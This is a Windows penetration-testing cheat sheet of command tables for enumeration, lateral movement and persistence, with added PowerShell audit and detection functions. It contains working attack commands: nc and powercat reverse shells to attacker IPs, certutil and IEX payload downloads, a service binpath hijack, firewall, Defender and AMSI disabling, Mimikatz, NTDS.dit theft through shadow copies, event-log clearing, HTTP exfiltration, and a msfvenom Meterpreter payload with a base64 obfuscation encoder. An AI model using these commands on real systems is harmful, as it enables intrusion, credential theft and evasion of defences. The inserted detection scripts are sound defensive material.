Windows
Number or ID | Versions |
---|---|
NT 3.1 | Windows NT 3.1 (All) |
NT 3.5 | Windows NT 3.5 (All) |
NT 3.51 | Windows NT 3.51 (All) |
NT 4.0 | Windows NT 4.0 (All) |
NT 5.0 | Windows 2000 (All) |
NT 5.1 | Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) |
NT 5.2 | Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise) Windows Home Server |
NT 6.0 | Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate) |
NT 6.1 | Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise) |
NT 6.2 | Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard) |
Command | Explanation |
---|---|
%SYSTEMROOT% | Usually C:\Windows |
%SYSTEMROOT%\System32\drivers\etc\hosts | DNS entries |
%SYSTEMROOT%\System32\drivers\etc\networks | Network settings |
%SYSTEMROOT%\System32\config\SAM | Usernames and password hashes |
%SYSTEMROOT%\repair\SAM | Copy of SAM |
%SYSTEMROOT%\System32\config\RegBack\SAM | Backup copy of SAM |
%WINDIR%\system32\config\AppEvent.Evt | Application event log |
%WINDIR%\system32\config\SecEvent.Evt | Security event log |
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\ | Startup folder (all users) |
%USERPROFILE%\Start Menu\Programs\Startup\ | Startup folder (current user) |
%SYSTEMROOT%\Prefetch | Prefetch folder (records of executed EXEs) |
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific user
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
# Older Windows versions
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
%SystemDrive%\WINDOWS\Start Menu\Programs\Startup
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
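The folders above are the first place to look when reviewing a host for persistence. The following PowerShell function is an added example, not part of the original cheat sheet: it walks the startup folders listed above (the ProgramData folder, every profile under `%SystemDrive%\Users`, and the two legacy locations) and reports each file with its owner, last write time, SHA-256 and, for shortcuts, the resolved target. It assumes nothing beyond the paths on the page and the standard `WScript.Shell` COM object for reading `.lnk` targets.

```powershell
# Added example: audit the startup folders listed above and report every file
# found there, so persistence dropped into an autostart path stands out.
function Get-StartupFolderEntries {
    [CmdletBinding()]
    param(
        # Profile directories to examine; the default covers every user on the host.
        [string[]]$ProfileRoots = (Get-ChildItem -Path "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue).FullName
    )

    $startupSuffix = 'Microsoft\Windows\Start Menu\Programs\Startup'

    # Machine-wide folder (all users) followed by each user's roaming folder.
    $folders = @("$env:ProgramData\$startupSuffix")
    foreach ($root in $ProfileRoots) {
        $folders += Join-Path -Path $root -ChildPath "AppData\Roaming\$startupSuffix"
    }
    # Legacy locations from the list above, still worth checking on old images.
    $folders += "$env:SystemDrive\Documents and Settings\All Users\Start Menu\Programs\Startup"
    $folders += "$env:SystemDrive\WINNT\Profiles\All Users\Start Menu\Programs\Startup"

    $shell = New-Object -ComObject WScript.Shell   # used to resolve .lnk targets

    foreach ($folder in ($folders | Select-Object -Unique)) {
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        # -Force also returns hidden files; desktop.ini is expected here and skipped.
        $files = Get-ChildItem -LiteralPath $folder -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -ne 'desktop.ini' }
        foreach ($file in $files) {
            $target = $null
            if ($file.Extension -eq '.lnk') {
                # A shortcut with a harmless name can point anywhere; record where it really goes.
                $target = $shell.CreateShortcut($file.FullName).TargetPath
            }
            [pscustomobject]@{
                Folder        = $folder
                Name          = $file.Name
                Target        = $target
                Owner         = (Get-Acl -LiteralPath $file.FullName).Owner
                LastWriteTime = $file.LastWriteTime
                SHA256        = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
            }
        }
    }
}

# Usage: newest entries first. Recently written files, shortcuts whose target is
# outside Program Files, or entries owned by a non-administrative account are the
# ones to pull for closer review.
Get-StartupFolderEntries | Sort-Object LastWriteTime -Descending | Format-Table -AutoSize
```

The hash column lets the findings be compared against a known-good baseline or submitted to a reputation service; the owner column catches the common case of a file written by a standard user into a folder that only an installer should touch.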
Command | Explanation |
---|---|
ver | Operating system version |
sc query state= all | Show services |
tasklist /svc | Show processes and services |
tasklist /m | Show all processes and DLLs |
tasklist /S ip /v | Processes running remotely |
taskkill /PID pid /F | Force-kill a process |
systeminfo /S ip /U domain\user /P Pwd | Get system information remotely |
reg query \\ip\RegDomain\Key /v VALUE | Query the remote registry (/s = all values) |
reg query HKLM /f password /t REG_SZ /s | Search the registry for passwords |
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer | WSUS server address |
fsutil fsinfo drives | List drives (needs admin) |
dir /a /s /b c:\*.pdf | Find all PDF files |
dir /a /b c:\windows\kb* | Find patches |
findstr /si password *.txt *.xml *.xls | Search files for passwords |
tree /F /A c: > tree.txt | Directory listing of drive C: written to tree.txt |
reg save HKLM\Security security.hive | Save the Security hive to a file |
echo %USERNAME% | Current user |
whoami /priv | Current user's privileges |
Command | Description |
---|---|
net view /domain | Hosts in the current domain |
net view /domain:[MYDOMAIN] | Hosts in [MYDOMAIN] |
net user /domain | All users in the current domain |
net user user pass /add | Add a user |
net localgroup "Administrators" user /add | Add a user to Administrators |
net accounts /domain | Domain password policy |
net localgroup "Administrators" | List local admins |
net group /domain | List domain groups |
net group "Domain Admins" /domain | List admin users in the domain |
net group "Domain Controllers" /domain | List DCs for the current domain |
net share | SMB shares |
net session \| find / "\\" | List active SMB sessions |
net user user /ACTIVE:yes /domain | Unlock a domain user account |
net user user "newpassword" /domain | Change a domain user's password |
net share share c:\share /GRANT:Everyone,FULL | Share a folder |
Command | Description |
---|---|
tasklist /S ip /v | Processes running on ip |
systeminfo /S ip /U domain\user /P Pwd | System information of ip |
net share \\ip | Shares of ip |
net use \\ip | File system of ip |
net use z: \\ip\share password /user:DOMAIN\user | Map a drive with the given credentials |
reg add \\ip\regkey\value | Add a registry key on ip |
sc \\ip create service binpath= C:\Windows\System32\x.exe start= auto | Create a remote service (note the space after binpath= and start=) |
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:/windows/temp/nc.exe | Copy a file from ip to the current system via cmd.exe |
cmd.exe /c c:/windows/temp/nc.exe ip port -e cmd.exe | Reverse shell |
nc.exe -lvvp port | Listen on a specific port |
python3 -m http.server port | Start a web server |
xcopy /s \\ip\dir C:\local | Copy a folder from ip |
shutdown /m \\ip /r /t 0 /f | Restart the system ip |
Command | Description |
---|---|
ipconfig /all | IP configuration |
ipconfig /displaydns | DNS cache |
netstat -ano | Show connections |
netstat -anop tcp 1 | Netstat loop (refresh every second) |
netstat -ano \| findstr LISTENING | Listening ports |
route print | Routing table |
arp -a | MAC addresses of known systems (ARP table) |
nslookup, set type=any, ls -d domain > results.txt, exit | Attempt a DNS zone transfer |
nslookup -type=SRV _www._tcp.url.com | SRV record lookup (ldap, kerberos, sip) |
tftp -i ip GET remotefile | File transfer via TFTP |
netsh wlan show profiles | Saved wireless profiles |
netsh firewall set opmode disable | Disable the firewall (old syntax) |
netsh wlan export profile folder=. key=clear | Export Wi-Fi profiles with plaintext keys |
netsh interface ip show interfaces | List interface IDs/MTUs |
netsh interface ip set address local static ip nmask gw ID | Set a static IP |
netsh interface ip set dns local static ip | Set the DNS server |
netsh interface ip set address local dhcp | Set the interface to DHCP |
Command | Description |
---|---|
type file | Show file contents |
del path\*.* /a /s /q /f | Delete files under a path |
find /I "str" filename | Search a file for a string |
command \| find /c /v "" | Count the lines of a command's output |
at HH:MM file [args] (e.g. at 14:45 cmd /c) | Schedule a file to run |
runas /user:user "file [args]" | Run a file as a specific user |
shutdown /r /t 0 | Restart now |
sc stop UsoSvc | Stop the UsoSvc service |
sc start UsoSvc | Start the UsoSvc service |
sc config UsoSvc binpath= "c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe" | Change the executable path of the UsoSvc service |
tr -d '\15\32' < win.txt > unix.txt | Remove CR and ^Z (*nix) |
makecab file | Compress a file |
wusa.exe /uninstall /kb:### | Remove a patch |
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true" | Query the event log from the CLI |
lusrmgr.msc | Local Users and Groups manager |
services.msc | Services control panel |
taskmgr.exe | Task Manager |
secpol.msc | Local Security Policy manager |
eventvwr.msc | Event Viewer |
rundll32.exe user32.dll,LockWorkStation
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=4000 connectaddress=2.2.2.2
# Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f
psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe
psexec /accepteula \\ip -u Domain\user -p Lt1 c:\Program-1
psexec /accepteula \\ip -s cmd.exe
Create a regfile.reg file with the following lines in it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
reg import regfile.reg
net start "termservice"
sc config termservice start= auto
net start termservice
--OR--
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
netsh firewall set service type = remotedesktop mode = enable
schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f
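The `netsh advfirewall ... state off`, `netsh interface portproxy` and Terminal Server `reg add` lines above each change a setting that a defender wants to notice after the fact. The PowerShell function below is an added example, not part of the original cheat sheet: it reads those settings back and reports RDP enabled, Network Level Authentication off, RDP moved off port 3389, any disabled firewall profile, and every persisted portproxy forwarder. It assumes the registry locations the commands above write to, plus the `PortProxy\v4tov4\tcp` key under `Services` where netsh stores forwarders, and uses `Get-NetFirewallProfile` where that cmdlet exists (Windows 8 / Server 2012 and later).

```powershell
# Added example: configuration drift check for the remote-access settings
# changed by the commands above. Everything is read from the registry or
# Get-NetFirewallProfile rather than parsed out of netsh text.
function Get-RemoteAccessFindings {
    $findings = @()
    function New-Finding($Area, $Setting, $Value, $Note) {
        [pscustomobject]@{ Area = $Area; Setting = $Setting; Value = $Value; Note = $Note }
    }

    # Terminal Server keys written by the reg add / reg import lines above.
    $ts   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdp  = "$ts\WinStations\RDP-Tcp"
    $deny = (Get-ItemProperty -Path $ts  -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    $nla  = (Get-ItemProperty -Path $rdp -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication
    $port = (Get-ItemProperty -Path $rdp -Name PortNumber         -ErrorAction SilentlyContinue).PortNumber

    if ($deny -eq 0) { $findings += New-Finding 'RDP' 'fDenyTSConnections' $deny 'Remote Desktop connections allowed' }
    if ($nla  -eq 0) { $findings += New-Finding 'RDP' 'UserAuthentication' $nla  'Network Level Authentication disabled' }
    if ($null -ne $port -and $port -ne 3389) {
        $findings += New-Finding 'RDP' 'PortNumber' $port 'RDP listener moved off the default port'
    }

    # netsh portproxy persists each forwarder as a value named "listenaddress/listenport"
    # whose data is "connectaddress/connectport". The IP Helper service applies these
    # at start, so an entry here survives reboots even if nothing is listening right now.
    $proxyKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    if (Test-Path -Path $proxyKey) {
        $key = Get-Item -Path $proxyKey
        foreach ($name in $key.GetValueNames()) {
            $data = $key.GetValue($name)
            $findings += New-Finding 'PortProxy' $name $data 'TCP forwarder listen -> connect'
        }
    }

    # Firewall profile state (NetSecurity module, Windows 8 / Server 2012 and later).
    if (Get-Command -Name Get-NetFirewallProfile -ErrorAction SilentlyContinue) {
        foreach ($fwProfile in (Get-NetFirewallProfile)) {
            if ($fwProfile.Enabled -eq 'False') {
                $findings += New-Finding 'Firewall' $fwProfile.Name $fwProfile.Enabled 'Profile disabled'
            }
        }
    }

    $findings
}

# Usage: an empty result means none of the conditions above is present.
Get-RemoteAccessFindings | Format-Table -AutoSize
```

Run it from a scheduled baseline job and diff the output over time: a new `PortProxy` row or a `UserAuthentication` of 0 appearing between runs is far easier to act on than the same fact buried in `netsh` output.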
Command | Description |
---|---|
wmic [alias] get /? | List all properties |
wmic [alias] call /? | Callable methods |
wmic process list full | Process properties |
wmic startup list full | Startup items |
wmic ntdomain list | Domain and DC information |
wmic qfe | List all patches |
wmic process call create "process_name" | Run a process |
wmic process where name="process" call terminate | Terminate a process |
wmic logicaldisk get description,name | Display logical disks |
wmic cpu get DataWidth /format:list | Show whether the system is 32- or 64-bit |
wmic service where started=true get name,startname | Show running services and their accounts |
[alias] == process, share, startup, service, nicconfig, useraccount, etc.
[where] == where (name="cmd.exe"), where (parentprocessid!="[pid]"), etc.
[clause] == list [full|brief], get [attrib1, attrib2], call [method], delete
wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\evil.exe"
wmic product get name /value # Get software names
wmic product where name="XXX" call uninstall /nointeractive
wmic /node:remotecomputer computersystem get username
wmic /node:machinename process list brief /every:1
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
wmic netlogin where (name like "%adm%") get numberoflogons
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
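The last `wmic service ... | findstr` chain above lists auto-start services whose binary is outside the Windows directory and whose image path is not quoted. The function below is an added example, not part of the original cheat sheet: it performs the same check with `Get-CimInstance` so the result is structured, and separately marks image paths that contain spaces but are unquoted, which is the misconfiguration the final `findstr /i /v """` filter is hunting for. It assumes `$env:SystemRoot` points at the Windows directory and that the `Win32_Service` class is available, which it is on any supported Windows.

```powershell
# Added example: structured version of the wmic | findstr service-path check above.
function Get-AutoStartServicePaths {
    [CmdletBinding()]
    param([string]$WindowsDir = $env:SystemRoot)

    $services = Get-CimInstance -ClassName Win32_Service -Filter "StartMode='Auto'" |
        Where-Object { $_.PathName }

    foreach ($svc in $services) {
        # Expand %SystemRoot%-style references so the comparison below is on real paths.
        $path = [Environment]::ExpandEnvironmentVariables($svc.PathName.Trim())

        # Executable part of the image path: everything up to and including ".exe",
        # which also covers unquoted paths that carry arguments after the binary.
        $exeEnd = $path.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
        if ($exeEnd -ge 0) {
            $exe = $path.Substring(0, $exeEnd + 4).Trim('"')
        } else {
            $exe = ($path -split ' ')[0].Trim('"')
        }

        $unquotedSpace  = (-not $path.StartsWith('"')) -and ($exe -match '\s')
        $outsideWindows = -not $exe.StartsWith($WindowsDir, [StringComparison]::OrdinalIgnoreCase)

        if ($outsideWindows -or $unquotedSpace) {
            [pscustomobject]@{
                Name              = $svc.Name
                RunsAs            = $svc.StartName
                State             = $svc.State
                Executable        = $exe
                UnquotedSpacePath = $unquotedSpace
                OutsideWindowsDir = $outsideWindows
                ImagePath         = $svc.PathName
            }
        }
    }
}

# Usage: rows with UnquotedSpacePath = True should be fixed with
#   sc config <name> binpath= "<quoted path>"
# The remaining rows are the third-party services to review for weak binary or directory ACLs.
Get-AutoStartServicePaths | Sort-Object UnquotedSpacePath -Descending | Format-Table -AutoSize
```

An unquoted path such as `C:\Program Files\Vendor\agent.exe` is resolved by the service control manager by trying `C:\Program.exe` first, so the fix is always to quote the path; the `RunsAs` column shows which account would be affected if such a path were ever abused.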
1. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"
# If any shadow copies already exist then exfil them, otherwise create one using the following commands. Check output.txt for any errors.
2. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"
3. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive 2>&1 > C:\temp\output.txt"
4. wmic /node:DC_IP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1 > C:\temp\output.txt"
Step-by-step instructions for the step below are on room362.com.
5. From Linux, download and run ntdsxtract and libesedb to export hashes or other domain information
a. Additional instructions can be found under the VSSOWN section
b. ntdsxtract - http://www.ntdsxtract.com
c. libesedb - http://code.google.com/p/libesedb/
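Each of steps 1 to 4 above leaves a process-creation record on the domain controller, and the sequence is distinctive: `vssadmin` enumerating or creating a shadow copy, then `copy` reading `NTDS.dit` or a registry hive through a `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy` path. The script below is an added example, not part of the original cheat sheet: it parses constructed process-creation records (the fields of Security event 4688 with command-line auditing enabled, or Sysmon event 1), matches the three stages, and escalates when the same host and user show both the shadow-copy creation and the credential-store read. The six records are made up for the example; the field names are the ones those events carry.

```powershell
# Added example: detect the shadow-copy credential-access chain from steps 1-4
# above in process-creation records. The records below are constructed sample data.
$SampleProcessEvents = @(
    'TimeCreated=2024-05-01T10:01:02Z Host=DC01 User=CORP\svc_backup NewProcessName=C:\Windows\System32\vssadmin.exe CommandLine="vssadmin list shadows"',
    'TimeCreated=2024-05-01T10:01:09Z Host=DC01 User=CORP\svc_backup NewProcessName=C:\Windows\System32\vssadmin.exe CommandLine="vssadmin create shadow /for=C:"',
    'TimeCreated=2024-05-01T10:01:30Z Host=DC01 User=CORP\svc_backup NewProcessName=C:\Windows\System32\cmd.exe CommandLine="cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit"',
    'TimeCreated=2024-05-01T10:01:31Z Host=DC01 User=CORP\svc_backup NewProcessName=C:\Windows\System32\cmd.exe CommandLine="cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.hive"',
    'TimeCreated=2024-05-01T10:15:00Z Host=WS07 User=CORP\alice NewProcessName=C:\Windows\System32\notepad.exe CommandLine="notepad.exe C:\Users\alice\notes.txt"',
    'TimeCreated=2024-05-01T11:00:00Z Host=DC01 User="NT AUTHORITY\SYSTEM" NewProcessName=C:\Windows\System32\wbem\WmiPrvSE.exe CommandLine="C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"'
)

# Parse one key=value record (values may be double-quoted) into an object.
function ConvertFrom-ProcessEventLine {
    param([Parameter(Mandatory)][string]$Line)
    $fields = @{}
    foreach ($m in [regex]::Matches($Line, '(\w+)=("[^"]*"|\S+)')) {
        $fields[$m.Groups[1].Value] = $m.Groups[2].Value.Trim('"')
    }
    [pscustomobject]$fields
}

function Find-ShadowCopyCredentialAccess {
    param([Parameter(Mandatory)][string[]]$Lines)

    $rules = @(
        @{ Name = 'ShadowCopyEnumerated'; Severity = 'Low';    Pattern = 'vssadmin(\.exe)?\s+list\s+shadows' },
        @{ Name = 'ShadowCopyCreated';    Severity = 'Medium'; Pattern = 'vssadmin(\.exe)?\s+create\s+shadow' },
        # NTDS.dit or the SYSTEM/SAM/SECURITY hives read through a shadow copy device path.
        @{ Name = 'CredentialStoreReadFromShadow'; Severity = 'High';
           Pattern = 'HarddiskVolumeShadowCopy\d+\\.*(NTDS\.dit|config\\(SYSTEM|SAM|SECURITY))\b' }
    )

    $hits = foreach ($line in $Lines) {
        $ev = ConvertFrom-ProcessEventLine -Line $line
        foreach ($rule in $rules) {
            if ($ev.CommandLine -match $rule.Pattern) {   # -match is case-insensitive
                [pscustomobject]@{
                    Severity = $rule.Severity; Rule = $rule.Name; Host = $ev.Host
                    User = $ev.User; Time = $ev.TimeCreated; CommandLine = $ev.CommandLine
                }
            }
        }
    }

    # A shadow copy created and a credential store read by the same host and user
    # is the complete chain from the steps above, so escalate those hits together.
    foreach ($group in ($hits | Group-Object -Property Host, User)) {
        $names = $group.Group | ForEach-Object { $_.Rule }
        if ($names -contains 'ShadowCopyCreated' -and $names -contains 'CredentialStoreReadFromShadow') {
            foreach ($hit in $group.Group) { $hit.Severity = 'Critical' }
        }
    }
    $hits
}

# Usage with the constructed records: the four DC01/svc_backup events are reported,
# all Critical because the chain is complete; notepad and WmiPrvSE produce nothing.
Find-ShadowCopyCredentialAccess -Lines $SampleProcessEvents | Format-Table Severity, Rule, Host, User, Time -AutoSize
```

On a real domain controller the same function can be fed lines built from `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688}` once "Include command line in process creation events" is enabled; without that policy the `CommandLine` field is empty and only the `vssadmin.exe` process name itself is visible.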
Command | Description |
---|---|
stop-transcript | Stop recording |
get-content file | Display the contents of a file |
get-help command -examples | Show command examples |
get-command *string* | Search for a cmdlet |
get-service | Show services (stop-service, start-service) |
get-wmiobject -class win32_service | Show services with account information |
$PSVersionTable | Show the PowerShell version |
powershell.exe -version 2.0 | Run PowerShell 2.0 from version 3.0 |
get-service \| measure-object | Count of services |
get-psdrive | List PSDrives |
get-process \| select -expandproperty name | Show process names |
get-help * -parameter credential | Commands that accept credentials |
get-wmiobject -list *network* | Available network WMI classes |
[Net.DNS]::GetHostEntry("ip") | DNS lookup |
powershell.exe wget "http://10.10.10.10/nc.exe" -outfile "c:\temp\nc.exe" | Download and save a file |
powershell.exe -c "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/powercat.ps1'); powercat -c 10.10.10.100 -p 4444 -e cmd" | Reverse shell |
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1 | Web server on port 8050 |
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | Use mimikatz |
Import-Module .\Invoke-Mimikatz.ps1 | Load a .ps1 script |
iwr -uri http://10.10.10.10/file -o file.exe | Download and save a file |
Import-Module .\Invoke-Obfuscation\Invoke-Obfuscation.psm1
Out-ObfuscatedTokenCommand -Path .\powerview.ps1 | Out-File out
Or
https://raw.githubusercontent.com/kmkz/Pentesting/master/AMSI-Bypass.ps1
. .\AMSI-Bypass.ps1
Invoke-AmsiBypass
powershell -command Set-MpPreference -DisableRealtimeMonitoring $true
$users = New-Object DirectoryServices.DirectorySearcher
$users.Filter = "(&(objectclass=user))"
$users.SearchRoot = ''
$users.FindAll()
$computers = New-Object DirectoryServices.DirectorySearcher
$computers.Filter = "(&(objectclass=computer))"
$computers.SearchRoot = ''
$computers.FindAll()
Set-ADAccountControl -identity jorden -doesnotrequirepreauth 1
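`Set-ADAccountControl -DoesNotRequirePreAuth` sets the DONT_REQ_PREAUTH bit (0x400000) in the account's `userAccountControl`, which lets anyone request an AS-REP for that account and crack it offline. The function below is an added example, not part of the original cheat sheet: it audits for that bit using the same `DirectoryServices.DirectorySearcher` API as the user and computer queries above, so it needs no ActiveDirectory module. It assumes a domain-joined host (the searcher defaults to the current domain, as above) and uses the LDAP bitwise-AND matching rule OID `1.2.840.113556.1.4.803`, which exists on every Active Directory version.

```powershell
# Added example: list enabled users whose userAccountControl has DONT_REQ_PREAUTH set.
function Find-NoPreauthUsers {
    param(
        # Distinguished name to search under; empty means the domain root, as in the queries above.
        [string]$SearchBase = ''
    )
    $DONT_REQ_PREAUTH = 0x400000
    $ACCOUNTDISABLE   = 0x2

    $searcher = New-Object DirectoryServices.DirectorySearcher
    if ($SearchBase) {
        $searcher.SearchRoot = New-Object DirectoryServices.DirectoryEntry("LDAP://$SearchBase")
    }
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, so the flag bits
    # are tested server-side instead of pulling every user and testing them here.
    $searcher.Filter = "(&(objectCategory=person)(objectClass=user)" +
        "(userAccountControl:1.2.840.113556.1.4.803:=$DONT_REQ_PREAUTH)" +
        "(!(userAccountControl:1.2.840.113556.1.4.803:=$ACCOUNTDISABLE)))"
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'useraccountcontrol', 'memberof', 'whenchanged'))

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        [pscustomobject]@{
            SamAccountName     = $p['samaccountname'][0]
            UserAccountControl = ('0x{0:X}' -f [int]$p['useraccountcontrol'][0])
            GroupCount         = $p['memberof'].Count
            WhenChanged        = $p['whenchanged'][0]
            DistinguishedName  = $result.Path
        }
    }
}

# Usage: any row is a finding. Clear the flag with the cmdlet from the line above,
#   Set-ADAccountControl -Identity <name> -DoesNotRequirePreAuth $false
# unless the account has a documented reason (some legacy Kerberos clients) for needing it.
Find-NoPreauthUsers | Format-Table -AutoSize
```

`WhenChanged` is worth keeping in the output: an account whose flag was set recently, by a change nobody can account for, is the case that matters most, and a scheduled run of this query that alerts on new rows catches it.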
Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01
Get-WmiObject -class win32_operatingsystem | select -property * | export-csv c:\os.txt
Get-Service | where-object {$_.status -eq "Running"}
New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i
Get-ChildItem -Path c:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
(new-object system.net.webclient).downloadFile("url","dest")
$ports=(#,#,#);$ip="x.x.x.x";foreach ($port in $ports) {try {$socket=New-object System.Net.Sockets.TCPClient($ip,$port);} catch {};
if ($socket -eq $NULL) {echo $ip":"$port" - Closed";}
else {echo $ip":"$port" - Open";$socket=$NULL;}}
$ping = New-Object System.Net.NetworkInformation.Ping
$ping.Send("ip",500)
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
$Host.UI.PromptForCredential("title","message","user","domain")
powershell.exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]') {Start-Process -WindowStyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400}}while(1)"
$pw = convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "DOMAIN\user", $pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process file.exe -verb runas}'
powershell iwr -usebasicparsing http://192.168.2.x/SharpHound.exe -OutFile SharpHound.exe
powershell.exe Send-MailMessage -to "email" -from "email" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer TargetEmailServerIP
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item wsman:\localhost\client\trustedhosts *'"
at \\ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='DOMAIN'" | select textrepresentation
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source="""https://YOUR_SPECIFIED_IP/file.zip"""; $destination="C:\master.zip"; $http = new-object System.Net.WebClient; $response = $http.DownloadFile($source, $destination);"
The command below sends a file ($filepath) to a server ($server) over HTTP via a POST request.
A web server must be listening on the port designated in $server.
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server="""http://YOUR_SPECIFIED_IP/folder"""; $filepath="C:\master.zip"; $http = new-object System.Net.WebClient; $response = $http.UploadFile($server,$filepath);"
Needs Metasploit v4.5+ (msfvenom supports PowerShell)
Use PowerShell (x86) with 32-bit Meterpreter payloads
The encodeMeterpreter.ps1 script is given below
1. ./msfvenom -p windows/meterpreter/reverse_https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 > audit.ps1
2. Move audit.ps1 into the same folder as encodeMeterpreter.ps1
3. Launch PowerShell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.ps1
5. Copy the encoded Meterpreter string
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_https
4. set LHOST 1.1.1.1
5. set LPORT 443
6. exploit -j
1. powershell.exe -noexit -encodedCommand <paste encoded Meterpreter string here>
PROFIT
# Get Contents of Script
$contents = Get-Content audit.ps1
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$contents | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 Encode Stream
$code = [Convert]::ToBase64String($ms.ToArray())
# Build the one-liner that inflates and runs the script; the backtick keeps each $( ) literal so it is evaluated by the target, not here
$command = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream(,`$([Convert]::FromBase64String('$code')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
# Invoke-Expression $command
